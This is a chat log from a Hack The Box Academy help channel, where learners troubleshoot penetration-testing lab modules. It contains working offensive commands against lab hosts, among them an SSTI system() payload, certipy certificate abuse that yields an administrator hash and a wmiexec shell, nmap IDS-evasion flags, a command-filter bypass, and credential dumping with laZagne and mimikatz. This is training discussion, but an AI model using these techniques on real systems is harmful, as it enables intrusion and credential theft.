#modules

wdym the password list? dont we have to try every username and password combination

yeah, but it still shouldnt take that long

Feel slightly embarrassed asking this but I could use some help with the file upload modules

which part

The whole file upload part, I uploaded my file and got past all the defenses but I’m not sure where my file landed

I checked the path I got from the source code but no dice

not sure which section that is

It’s the File Upload Skills Assesement

Sorry for not being more specific

oh i see

try checking the response with burp

See that’s what I did.

But no dice on the whole checking the response and the file getting renamed thing

So I suspect the file may be getting renamed

nooo you never have to be afraid for asking questions!

ill check again rq

been a while

I appreciate it thanks

anyone i could DM for Advanced XSS and CSRF Exploitation XSS Filter Bypasses?

Bypassed the XSS filter, but can't retrieve any data... tried with and without ports... tested with ports to XSS myself and aren't hitting CORS errors.. not sure what else I can do if I can't even XSS myself lol

I can use the vulnerablesite.htb to send a request to exfiltrate.htb, but exploit.htb doesn't do anything

Is it not vulnerablesite.htb calls exploitserver.htb which then calls exfiltrate.htb?

yeah just open the response in browser

have you tried a real image yet?

Yeah I just get an image thumbnail

can you dm the response

Let me go back and grab it for you. Do you mind waiting?

yeah alr

Is there someone that have completed the ADCS module section ESC5, i am having troubles with the last step, no matter how many times i revert the lab its always the same

~ # proxychains4 -q certipy auth -pfx administrator.pfx -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp -domain lab.local
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@lab.local
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
~ # 

As far as i understand this is yet another buggy lab... the support team is less than helpful, so can someone at least share the flag for this section... i really want to wrap up this module and move to the next one...

I am stuck on the Nmap Hard lab, I am able to see the state of port 50000 now open.. but now able to retrieve the banner. Would someone like to point me into to right direction? sudo nmap -sS -Pn -f --mtu 16 -D RND:10 -T1 -p 50000 --source-port 53 -sV --version-intensity 0 --data-length 32 --randomize-hosts 10.129.38.221

Seeking help with Advanced XSS and CSRF Exploitation - XSS Filter Bypasses

If you can see the port is open, try the next step in the modules section where it is similar.

guys with a little hint i was able to solve xss/csrf skill ass final step
Honestly i still cant imagine the query it's running in backend

is it clear for anyone? or ask the source code is running behind to fully undesrand? i spent days for this skill ass, and i'd like to fully undestand

"advanced xss and csrf" for cwee

Hi all, I have just submitted my CPTS exam with report..

I am little bit confused. there was just a button to upload your report. I clicked on it and browsed my report and uploaded. and it showed my report name on the button,

the confusion is that, is there any other place where my report will be shown that i have uploaded it????

or just we to browse it from the system and submit the exam

Okay, thanks

Good afternoon people i'm writing in burpsuite the direction web but, i can't lesen the direction web

the page remains blank in history containers 😦

After its uploaded, there’s no way to see it again

But I’m sure it went fine 👌

oh ok, that’s means i did it right…
thanks for the reply

Fingers crossed for the result 🤞

yes….

hello?

Hi?

someone can help me?

With what?

with burpsuite

They have a discord

i can't put in php wrapers 😦

just i have history

Maybe go over the burp module

what

https://academy.hackthebox.com/module/details/110

Or just go to their discord…

the program oh my goof

good

Look at the module I wrote above. It’ll teach you the basics 🙂

What's up? I had to hack it other way and got the flag.

i need some help.. i was able to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt using mssclient.py. But i tried it with the PowerUpSQL and couldnt do it. Can anyone help pleasee?

Did you import it?

Yes

Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version' this command works

I read the git hub cheatsheet but couldnt find a command to get the flag

I mean... i found the commands but none of them worked

is tree a ParrotOS native cmd or something? I see it used in a lot of acad modules but the cmd doesnt exist oob on my ubuntu or kali installs... and no apt suggestion is thrown to install it...

tree isn't installed by default on Debian derivatives. apt install tree

no idea about parrot

It's there default I think

thanks, im unsure i actually /need/ it but every time i see it mentioned or pictured on modules i tend to open my term and "try" it... just to see

it's a nice command

it does seem helpful. i think i have an alias that does something similar

altho less useful, as ls does not (to my knowledge) have a way of listing just dirs (if that is what tree does)

ls could have the same functionality as tree

hello, hack the box don´t have a comunity for spanish speakers?

Not on the discord, no

uh, and in other site?

Not sure about other places

Maybe in #1225791307256168448 you can find Spanish speaking teams

And go to their communities

ohhh

okay

But there's no official Spanish community

okay I understandt

thank you

Hello
I need a small hint with this question: “Examine the target and find out the password of the user Will. Then, submit the password as the answer.” I already found Kira’s password; I checked the .mozilla folder and found 2 files but no one contain the login.json files ||" wx------ 2 kira kira 4096 Feb 9 2022 lktd9y8y.default
drwx------ 7 kira kira 4096 Feb 9 2022 ytb95ytb.default-release||
" i saw a lot of people talking about cracking users hashes but i couldn`t find it , any help ?

Read and follow #welcome for more access to the server

You'll need to use a showcased tool to dig into the Mozilla logins

it is not mention in the model right ?

It is mentioned and showcased in the section

i tried laZagne.py i couldn`t run it also tried mimipenguin.py but i have no root privliges

laZagne should work. No root required

there is no python on the machine

are u sure ?

You might have to specify python3 instead of just python

But I don't recall any issues extracting info

i guess it is script issues

Nah

everytime i get this error Traceback (most recent call last):
File "laZagne.py", line 17, in <module>
from lazagne.config.write_output import write_in_file, StandardOutput
ModuleNotFoundError: No module named 'lazagne'

Did you move the whole thing over or just the .py

just .py

Otherwise you can try and copy over the .Mozilla file and try and get lazagne to hit that

But I recommend pulling over all the files, or if there's a releases section, using that

Can check the history and possibly identify another tool to use.

So Im doing the server side attacks skills assement and I got the ssrf vuln working but port scans revealed nothing and so was fuzzing the dirs

I was able to upload the whole zip file via SCP

you selling these?

<@&861185840277487616>

sorry you can't scam here

can i uhh get a little help here

Thanks @cloud urchin

Maybe play with it and see if you can read anything that is generally readable since ports aren't yielding anything useful.

By generally readable do you mean php files

tried that nothing

i am geuninely tweaking

http://truckapi.htb/?id%3D{{var_dump(['id']|escape('system','system'))}}
I managed to do this but still no luck```

I was referring to /etc/passwd

cant read that

You can shoot me a DM

yo i am on the using web proxies, zap scanner part, and when i am trying to use zap to spider the target it says out of scope which is ok but it says to start and that waht the module says to do, but nothing happens...

Looking to DM someone for help with Advanced XSS and CSRF Exploitation XSS Filtration Bypass

its only giving hud bugs....... and when i manually run it in zap it wont run needed thing for me to progress in the module

i had the same problem lmao, its the answer to question 3 in the LLMNR/NBT-NS poisoning From linux section

no worries

it was always a little frustrating to have to go back and find the passwords but I guess they don't want to allow cheating or something

Is this the right channel to ask questions about specific modules?

I'm on my second day trying to get through Web enumeration, total noob. I just get server time outs when I try to gobuster the target. When I ping it it shows up no packet loss. try to connect to site through mozilla same thing just times out. Any advice?

*Pentesting basics-Web enumeration

Are you using the given port?

And if there's subdomain fuzzing you'll need to --append-domain --domain inlanefreight.htb or whatever domain they give you

🤦‍♂️

Okay.. that solves that issue..

gobuster dir -u {target-IP:port} -w usr/share/dirb/wordlists/common.txt Now it says this file doesn't exist. confirmed it's the correct file path. Did I type this out wrong?

/usr/share

You're missing the leading /

sorry, I did type that in correctly in parrot..

/usr/share/dirb/wordlists/common.txt

Pwnbox doesn't have dirbuster installed so that wordlist isn't there

The seclists common.txt is similar with like a few more words, but it'll work

That's weird, I can navigate to that exact file path. Click Parrot on desktop- File System - filepath.

screenshots are probably necessary at this stage

Can't share screenshots unless they link their account [ #welcome ]

ah I thought modules allowed it

or used too

I thought I linked my account already but maybe not:/

Linking on the account.hackthebox.com section does nothing [ yet ]

Gotta follow the welcome instructions to do it properly

Testing.. just showing file path.

awesome

This is the error I get, or file path doesn't exist.

However, I was just able to connect to the web page on mozilla so maybe its my network shrugs

So is the Server-Side Attacks Skills Assessment broken still

reset target and try again

make a post in #1234357888114364508 then

is there anything wrong with zap and spider and do i need to reinstall it

I did that twice yesterday with no succes.. Today, first retry works! Huzzah!

awesome

Awesome sauce

awesome stuff

attacking SQL Databases I need help I've been using my main system with vpn and now attacking Sql db its not working can log in and am I suppose to use htbdbuser or mssqlsvc??

Impacket-mssqlclient

It helps to see what your full command is

Encountering a weird issue with an lsass dump, anyone know what the deal is? Running the cmd as admin btw

Ill try now thanks and keep you updated

Can you confirm a small matter for me?

I'm not able to do troubleshooting atm

oh thats alright

But when you get a chance please look in #1234357888114364508

No idea I don't think I did that module

¯_(ツ)_/¯

How...convient

Why not just use logonpasswords or try pypykatz

Did you get the right mimikatz binaries for your architecture (minidump is opened from a Windows NT of another architecture (x86 vs x64)) ?

I hadn't considered that but its definitely possible; testing now

what's the version on your mimikatz, have you tried dumping lsass with alternative tools? (task mgr, nanodump, procdump)

It was totally this, cloned mimikatz from the wrong location accidently got the 32x binary 😭

I opend RDP session to window machine but start menu not shown. how can i access it?

Likely due to window size, resize

is that due to a windows sizing issue ? In case you're using xfreerdp just append to the command the parameter /dynamic-resolution

Thank you very much 🙂
I added parameter and solved it

Yo is there anything wrong with zap, I am in the web fuzziness module on zap scanner and zap's hud is tweaking and I can't access and I set it up 5 tines restarting the instance and updating it.

Or has there been anything else mentioned and it's fizxes

i think my zap is different from yours

What module is this for? If not a module, we can’t help.

@storm elk ok no problem. I was only asking a general query.

This channel is for help with Academy modules.

yesterday there was a problem of not connecting via rdp now its this ..

and in the module shells and payload there is no other way to use this foothold to exploit other machines on the network ...

which section

skill assesment

yeah remmina is working

My partner near Christmas and Happy New year

but now its working

Why should we crack the password on a user's ticket? We can simply pass the ticket and gain access to the resources without the hassle of cracking the ticket's password.

What section?

If you know the password you can spray it against other accounts, for example when the user has a second admin account with the same pw

Hey were you able to solve it?

This currently does not work in the lab, it will be fixed in an upcoming update. Its due to WebDav Redirector not being installed/enabled on the target:
https://learn.microsoft.com/en-us/iis/publish/using-webdav/using-the-webdav-redirector#003

Is that about sharpview?

Ok nice thx for providing the answer 👍

The last question of sliver module. I know its ||extrasids|| but I cant get it to work

had the same problem in zephyr

Dm what commands your running

Anyone completed "MSSQL, Exchange, and SCCM Attacks"? in section "SCCM Auditing", just wondering why SCCMHunter doesn't populate all the SCCM information in the lab like it does in the walkthrough?

Logged a ticket, just incase its a content issue.

Yes and no. I have captured all flags, but there were a few gaps and things I never quite made work in this module, like the socks part

I can help later if you need

I just finished the module (spent 2 hours on a typo)

haha, thanks i'll pm you.

did you add all internal machines to your hosts file?

keeps changing

I didnt, Ill try that, thanks.

Yes, that worked, thanks mate.

need some advice on Advanced XSS and CSRF Exploitation Skill Assessment, I can't even do the first part lmao

I'm doing this exercise but I've been stuck for two days and I'm not making any progress. Can someone help me?

What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?

Detecting Windows Attacks with Splunk > Detecting RDP Brute Force Attacks (But this applies to the entire Leveraging Zeek Logs section)

When I try to access the splunk server on port 8000, I get an error. I checked the running processes and it says that splunk is running. Did anyone else encounter this?

htb-student@ubuntu:~$ ps aux | grep splunk
root        1311  4.5  3.2 539108 129580 ?       Sl   03:19   0:14 splunkd -p 8089 start
root        1339  0.0  0.3 100972 14300 ?        Ss   03:19   0:00 [splunkd pid=1311] splunkd -p 8089 start [process-runner]
root        1707  0.6  1.3 1490192 55008 ?       Sl   03:19   0:01 /opt/splunk/bin/python3.7 -O /opt/splunk/lib/python3.7/site-packages/splunk/appserver/mrsparkle/root.py --proxied=127.0.0.1,8065,8000
root        1709  0.2  1.3 187036 51992 ?        Sl   03:19   0:00 /opt/splunk/bin/splunkd instrument-resource-usage -p 8089 --with-kvstore
root        1779  0.0  0.0   4140   860 ?        S    03:19   0:00 /bin/sh -c /opt/splunk/bin/python3.7 /opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py
root        1780  0.3  1.4  77824 56140 ?        S    03:19   0:01 /opt/splunk/bin/python3.7 /opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py
htb-stu+    2492  0.0  0.0  17672   664 pts/0    R+   03:24   0:00 grep --color=auto splunk

Even doing it via RDP connection on the server browser didn't work

Module: RDP and SOCKS Tunneling with SocksOverRDP
i cant connect to the last machine 172.16.6.155 with the given creds jason:HTB_@cademy_stdnt!

Im in Module for NTA i sektion : Interrogating Network Traffic With Capture and Display Filters .. I don't figure out ware to find the file TCPDump-lab-2.zip is no link etc, i been look at the pwn box 2 without finding it. or It is the file from previous labs?

HTB is sensitive , and alot problem over VPN, try do your lab from a pwnbox.

ya its pwnbox.....

ok

anyone who has completed advanced xss and csrf? need a nudge

heey i have a question about this payload

http://truckapi.htb/?id%3D{{['ls']|filter('system')}}

server side attacks skill assessment, where i found the ssti vulnerability but can't encode some space to go to the home dir whatever i do to add some space it pops an error

found it

for yall who don't know and stuck on this, double encode and leave the spaces as it is

Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'

The ZAP HUD doesn't work for me

Web Attacks Advanced File Disclosure
Hi guys, can someone give some hints?

Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.

my req.txt

POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.200.254
Content-Length: 160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.200.254
Referer: http://10.129.200.254/blind/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

Are you saying after you ran it against the target it didn't identify any highs or it just isn't working?

none of the buttons on the zap hud work at all

i clicked on the automated scan in the thing and put the IP in but its taking way too long so idk im doing something wrong

It will take a few minutes to spider the target.

Can you DM a screenshot? I'll let you know if it looks like an issue or if you just need to wait.

i found the flag

but it doesn't accept it

someone had the exact same problem

Try refreshing the page and try the flag again.

wot that worked but

my brain just committed die

I'm doing the lab for double-pivots. I've changed the performance to modem and my connection is still unstable. Any suggestions ?

Hello, I need help with Attacking Authentication Mechanisms Skills Assessment.
I have tried the module provided script, jwt_tools and now i have written my own script.
Made my own private and public keys and also x5c certificate, none of these have worked so far.
Have not modified the payload, only played with the header, to see if i can forge tokens.
Also, verified that my signed jwt's are correct. Have read the forum and other posts here but they haven't made any sense to me.

Web Attacks Advanced File Disclosure
Hi guys, can someone give some hints?

Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.

my req.txt

POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.200.254
Content-Length: 160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.200.254
Referer: http://10.129.200.254/blind/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

I did it the manual way and not sure of XXEinjector. DM me

Trust Attacks -> ADCS
anyone know how to add the vulnerable ESC1 certificate without having to do it over RDP? (i.e. certipy, certify, cli, etc.)

This might be a 'works for all': CVE-2024-49019

certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip 10.129.205.199

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[] Using principal: administrator@lab.local
[] Trying to get TGT...
[] Got TGT
[] Saved credential cache to 'administrator.ccache'
[] Trying to retrieve NT hash for 'administrator'
[] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:<SNIP>

KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL

Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:>whoami
lab\administrator

How do I claim my reward?

Read the full sentence. 30 Streak Points every week to keep your Streak live. Yes it does say win special rewards, but it doesn't specify when

We need to see how you configured it. Whether you configured it correctly or not. Saying "I configured it" doesn't make it easy for people to see where you went wrong.

That makes sense. Appreicate it. How are you uploading images? I do not have that available.

Probably because you should be able to identify some open ports in that sections assessment?

I got my own target.

remove your --min-rate

So maybe scan it differently

I'll do it in a second

Do you see anything wrong with my command?
nmap -sT -Pn -p- -oN tcp_ports --min-rate 10000 10.129.3.148

--min-rate 10000

Is that your initial scan you used to answer the question?

It's the first question, I don't understand what you are asking

he means is that the only scan you've done

Oh, I've also done a general scan but same result

yeah try and remove --min-rate

anyone.. please... for the skill assessment of Advanced XSS and CSRF Exploitation im already moderator...should i be focusing XSS on the task management or upload? i've yet to get passed CSP...

or increase it

Remove it or increase it? Do you understand what --min-rate does?

Adjusting rate of packets sent

But this option is mainly used when you know the network bandwidth stats

Nmap will do its best to send packets as fast as or faster than the given rate.

I disagree since this scan would take hours if I would remove the option

testing rn

Like did you start with that are you scan or did you start with something less busy, i.e., less options to see if you got any results? For instance, you would simply start with just nmap -Pn IP or even hit all of the ports to see if you even get any results and then start adding in more options to tweak your scan if necessary. It might be more difficult for you to troubleshoot something like that if you come out the gate with a scan query like that.

Am i allowed to use the courseware of hackthebox academy, to write some writeup on?

Okay I just restarted the target and everything works now. Appreciate it man 🙏

What does the filtered state of a port on an nmap scan mean?

Nmap cannot correctly identify whether the scanned port is open or closed because either no response is returned from the target for the port or we get an error code from the target.

So with your initial scan query, it is fine, you just needed to move some things around. In this screenshot, you still had the output filename without the output switch.

You're right

Move things around like this if you wanted it to work and output into a file nmap -sT -Pn -p- 10.129.3.148 --min-rate 10000 -oN tcp_ports

Any clue what am I supposed to do in this question?
Enumerate the hostname of your target and submit it as the answer. (case-sensitive)

Currently on this module:

https://academy.hackthebox.com/module/109/section/1038

There is a little exercise outside of the regular flag at the end of the module that goes like this:

who$@ami
w\ho\am\i

Exercise: Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character. Would you be able to bypass that as well, using the techniques we learned in the previous section?

--

wh$@mi works just fine, w\ho\am\i doesn't, so it says to utilize techniques from the previous section to make it work. The previous section mentions this:

Character Shifting
There are other techniques to produce the required characters without using them, like shifting characters. For example, the following Linux command shifts the character we pass by 1. So, all we have to do is find the character in the ASCII table that is just before our needed character (we can get it with man ascii), then add it instead of [ in the below example. This way, the last printed character would be the one we need:

CPTmevius@htb[/htb]$ man ascii # \ is on 92, before it is [ on 91
CPTmevius@htb[/htb]$ echo $(tr '!-}' '"-~'<<<[)

\

--

I've tried a few ways to use this but I can not figure out how to do it in burp, does anyone else know how to do this?

use -sC

Yeah I realize what I did wrong thanks 🙏

I doubt you need to scan the subnet, but I could be wrong.

Run scripts? What do I give in as the answer?

Probably a NETBIOS output which will reveal the hostname

where do i go for module help if this chat is unable to help?

htb forums

You're not asking for help in a clear way.

trying to be unclear to not spoil it lol

just more of a directional thing

Got it man @rustic sage
Got it through the smb-os-discovery script

you have a streak of 30 weeks, the 30 streak points you refer to are divided by 10 each for every answer you correctly answer of every chapter inside a module you finish.

Yeah, I just tested with -sC (I think that SMB script is default)

┌──(p1erce㉿ATKBOX)-[~]
└─$ nmap -sC -Pn --disable-arp-ping 10.129.106.74
<SNIP>
|   NetBIOS computer name: NIX-<ANSWER-REDACTED>\x00

Yeah could have also just selected the ports I found to save time but we're good

absolutely, glad to help

In Pivoting, Tunneling, and Port Forwarding Skill Assessment, i got the creds for mlefay and vfrank already, but i cant rdp in either alive host ||.25|| and|| .45||

any hint for that

ssh?

i doubt that

-sn doesn't get a hostname

Read the nmap docs to understand the commands and options/flags

idk why but after trying for 30 min, my initial approach worked xD

it does IF there is a reverse DNS entry

the last question of Pivoting, Tunneling, and Port Forwarding: Skill Assessment
Submit the contents of C:\Flag.txt located on the Domain Controller.

i solved it simply by ||accessing the share, is this the right way?||

Yes that's correct

okay thanks

I confirmed it way back when I did it with Tejas or someone to make sure it wasn't an error

I figured it out. I forgot to set the TARGETURI and Traversal depth from the show options command. In case it helps anyone.

I do not know why i cannot download

┌──(root㉿kali)-[~/Downloads]
└─# wget -m --no-passive ftp://anonymous:anonymous@10.129.186.239:2121
--2024-12-16 11:14:25-- ftp://anonymous:*password*@10.129.186.239:2121/
=> ‘10.129.186.239:2121/.listing’
Connecting to 10.129.186.239:2121... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> PORT ... done. ==> LIST ... done.

10.129.186.239:2121/.listing [ <=> ] 255 --.-KB/s in 0s

2024-12-16 11:14:34 (30.7 MB/s) - ‘10.129.186.239:2121/.listing’ saved [255]

--2024-12-16 11:14:34-- ftp://anonymous:*password*@10.129.186.239:2121/passwords.list
=> ‘10.129.186.239:2121/passwords.list’
==> CWD not required.
==> PORT ... done. ==> RETR passwords.list ... done.
Length: 1959 (1.9K)

10.129.186.239:2121/passwords.list 0%[ ] 0 --.-KB/s

Hei

can anyone help me why i cannot download?

hi

I wanna to join Advent of Cyber 2024 now can i?. Can I learn it from it's first...

** Detecting Windows Attacks with Splunk > Detecting Golden Tickets/Silver Tickets**
For which "service" did the user named Barbi generate a silver ticket?
I've tried using the mentioned silver-ticket SPL queries mentioned in the section, but modifying it and extracting service_names has proved fruitless. Any tips?

@kindred acorn try with sudo. what is it?

Attacking Common Services - Attacking FTP

Send the contents of the flag.txt file to the administrator's desktop in MS01

Active Directory Enumeration & Attacks Module
In this case you could import inveigh.ps1 to poll the network and scan other hosts on the network

Also stuck on this

Any help?

Instead of wget just login ftp normally

I also used ftp it downloads users.list but does not download passwords.list

┌──(root㉿kali)-[~/Downloads/10.129.186.239:2121]
└─# ftp 10.129.186.239 2121
Connected to 10.129.186.239.
220 ProFTPD Server (InlaneFTP) [10.129.186.239]
Name (10.129.186.239:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||63690|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 1959 Apr 19 2022 passwords.list
-rw-rw-r-- 1 ftp ftp 72 Apr 19 2022 users.list
226 Transfer complete
ftp> get passwords.list
local: passwords.list remote: passwords.list
229 Entering Extended Passive Mode (|||60110|)
150 Opening BINARY mode data connection for passwords.list (1959 bytes)
0 0.00 KiB/s

wget -m --no-passive ftp://anonymous:anoymous@IP

i am totally fresher in this feild...and i enrolled by the module learning process...because i am absolutely in 0 level...anyone here who can guide me properly?

I am working on the AD Bloodhound module. The question is asking what rights the user Sarah has over the user Nicole. I can see the edge in Bloodhound, but That answer is not being accepted. Has anyone done this that can give me a hint please?

you can dm me and give me your answer, but the edge that bloodhound gives to you should be the right answer

I'm not allowed to DM you

send me a friend request

anyone know why I dont have the templates in here

is there a way of making RDP into windows environments in modules more stable? having issues where the connection will drop out

You'd need to download them, there's instructions on the sysreptor

Use the tcp vpn

i'm having trouble using tmux logging; where should my .tmux.conf file be located?

anyone else laugh whenever they see raiseChild.py

error connecting to /tmp/tmux-1000/default (No such file or directory) ; i'm getting this error when running # tmux source .tmux.conf

Could i DM someone for http misconfigurations Common Session Variables (Account Takeover) tried everything taught in the module but no luck.

Hey. I'm on the NMAP module, the hard lab in the IPS/IDS evasion section/

What would a result for a simple scan like this mean?

"919 filtered tcp ports (no-response), 81 filtered tcp ports (host-unreach)

On the broken Auth module is the correct command to generate the password policy wordlist this?
cat rockyou.txt | grep '[[:upper:]]' | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{12}' > custom_wordlist2.txt

i got gladys but i dont know what to do next since my passwords arent working

any help ?

okay i just found out that i cracked the hashes lol

i need a brake maybe

never mind lel\

Try a Syn scan and maybe read the evasion section again

stuck on the otp and i figute i need to perform some kind of auth bypass since i dont know the length of the token. But changing the reponse to 302 does nothing and using IDOR doesnt seem to be the right answer

Wait, should I 302 to profile?

Linux Privilege Escalation
Kernel Exploits

What is up with this? I am root but don't have access to the flag

Escalate privileges using a different Kernel exploit. Submit the contents of the flag.txt file in the /root/kernel_exploit directory.

okay 302 to profile doesnt work

here is a step-by-step guide for installing Sysreptor and importing the HTB designs and reports:

https://docs.sysreptor.com/htb-reporting-with-sysreptor/

thank you sorted

didnt realise I have to click create a project and select the design

never mind had to do the funny 302 to 200 trick

NMAP, IPS/IDS Evasion
Module: https://academy.hackthebox.com/module/19/section/119
Well I got this but I don't know what to put as the answer in the question
"Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer."

I tried:

Apache 2.4.29
httpd 2.4.29
2.4.29
OpenSSH
OpenSSH 7.6p1
Ubuntu
Ubuntu 4
4
Ubuntu Linux
Linux
ubuntu0.7
0.7

Hello everyone,
I am on the Web Attacks module and on the Mass IDOR Enumeration chapter. I managed to find the file but I have a problem on the Flag.
I don't know if it is related to the form or it is something else. Could someone give me a clue?

I see that the content of the file is HTML but without anything interesting

What else should I do when I find the file?

Hey! I've went over the evasion section a few times now. I don't see much on how to evade IPS/IDS on the udp based services?

I could be mistaken but I think I used --source-port for this

Then you didn't read carefully enough 😉 try everything, use -p- where applicable

Without -p- it just tries the top/most used 1000 ports

I think I have catched some weird bug, wanted to check my answers but they are definitely wrong, as example the word vagrant shown as the answer, where question was expecting number

hello guys one question about linux :
"Which option needs to be set to create a home directory for a new user using "useradd" command? "
my first answer is = sudo useradd -m
second : sudo eseradd -b

Is there a reason to add -sU? To scan for udp based ports?

but all the submitted answers are incorrect , google also says -m

I ran -p-, these are the two ports.

I got this port but still can't identify the version.

Any help guys?

are you answering with just the flag?

yes

have you tried doing from the pwnbox instead of from kali? I remember there being 2 instances where the flag was supposed to be in the nmap output and nmap would give a different output on the pwnbox from my vm

the second and third question/task require the longer version

which module and section?

https://academy.hackthebox.com/module/18/section/71

check your answer for any whitespaces

it doesn't seem to work : "sudo useradd -m"
"useradd -m"

i asked if you were answering with just the flag

I tried from kali but on the vpn

yea I'm saying from within the browser pwnbox it might give you a different result

but that answer contains the command too

answer with only the flag

ok

thank you it worked

have a nice day/night @dark hedge

That's not the right port

Try everything from the sections at least once

There's something about a --source-port in the reading

I used that already

everything you need is in the reading ¯_(ツ)_/¯

There is another tool that uses —source-port

Am new here

Welcome. Please read #welcome and #rules it will explain how to get verified

That's a weird source port to use

Does it matter?

Yes

hm, actually you dont even have to do that if you also import the demo reports

Read the section again

You're right now I see that I need to be using a port that the administrator might have misconfigured to not function well with the IPS/IDS

That's #starting-point

My aplogies! I will ask it there

Does a source-port of 80 make sense in my case? @safe star @fathom pendant

Nope

The reading gives you an idea what port to use

I mean in the section they use port 53

Do you know why 53? :)

Yes because it's where they might be running DNS

Well yes and no

The source port tells nmap that you're using that port on your machine for callbacks, instead of an arbitrary port

hi guys, i'm getting to the end of the Attacking AD module in the CPTS path. Just wondering if anyone has a kind of flowchart, diagram or checklist to share that can serve as an aid when attacking AD. I did see something like this a while back but not sure where- curious if ppl find this useful. It seems useful to me to have a bit of a checklist for different stages of what paths we can take, i.e. i have no credentials i need to enumerate, i have basic creds, i have admin etc.

Typical misconfiguration broadly allows incoming traffic from 53

Hey where is the channel for operation tincel trace?

thats the trick

It'll be a channel in a few days

My inputted source port refers to the port on my end right?

Yes

Yesss I got another port

The reading explains it

some applications only accept responses from port 53

I got another port when I ran it with source port 53

Search up active directory mindmap

Should be on github

perfect exactly what i was looking for

Let's go thank you so much guys I just got the flag @fathom pendant @safe star 🙏

does anyone know why nmap expects a single port like -p21 but a range or interval like -p 0-99 or -p 10000 (or however the syntax goes) i think its very strange that we must "remember" to not include a space for a single port scan

Hi, I came across some resources that might be helpful. Have you checked out the AD Attack Matrix or the SANS Institute's Active Directory Attack and Defense Cheat Sheet? Let me know if you need more information.

You can have a space

ok THANK YOU, i ALWAYS see it with the space omitted and never seen an explanation or w/e to say why we do or dont do that, and never thought to question whether it was even necessary

Just laziness

The way it's coded it doesn't matter

i've been working on generating shellcode academy module. the stack has some extra values, 0xc2, not shown in the academy module- 0xffffcffe: 0x55 0x55 0xc2 0x90 0xc2 0x90 0xc2 0x90
0xffffd006: 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90

ok cuz i do know some util switches DO require an absent space and will fail without one, and i start making erroneous connections about other instances where you see that kinda stuff, ya feel me?

tho i cannot think of anny off top

Decode the hex value to see the char

Looks to be a non-breaking space

hey @fathom pendant if you'll humor me a "silly" question, i have two "small" 22(24?" screens, but they're just wide enough to make glancing over at academy modules and back to pwnbox instance annoying... should i have any apprehension to using the integrated terminal? i used it once before but always default to pwnbox for some reason

Thx for the info I'll also check it out

just realized im complaining about having to tilt my head... technology man... its so over.

Honestly, integrated terminal is buggy af

I've used it maybe once or twice, have always had issues with it freezing/getting stuck

@sterile hawk Can you please check your DMs? I have a problem: I can't verify my Discord account with my HTB account.

i openvpn in without issue, ive rarely had problems. I have a 14 inch laptop and have academy on the left side terminal in top right and cherrytree in the bottom right, and it works lovely hehe

i'm in the Meterpreter section of the Metasploit module and this section i have a question about:

**"We have our Meterpreter shell. However, take a close look at the output above. We can see a .asp file named metasploit28857905 exists on the target system at this very moment. Once the Meterpreter shell is obtained, as mentioned before, it will reside within memory. Therefore, the file is not needed, and removal was attempted by msfconsole, which failed due to access permissions. Leaving traces like these is not beneficial to the attacker and creates a huge liability.

From the sysadmin's perspective, finding files that match this name type or slight variations of it can prove beneficial to stopping an attack in the middle of its tracks. Targeting regex matches against filenames or signatures as above will not even allow an attacker to spawn a Meterpreter shell before being cut down by the correctly configured security measures.

We proceed further with our exploits. Upon attempting to see which user we are running on, we get an access denied message. We should try migrating our process to a user with more privilege."
**
Does it makes sense to/can we, manually delete the file if the meterpreter attempt to delete it failed?

i guess it depends on why it failed no. It shows 403 forbidden in this example. Maybe you don't have the permissions. But the next step is priv esc which should allow you to delete it manually no? Just thinking out loud here

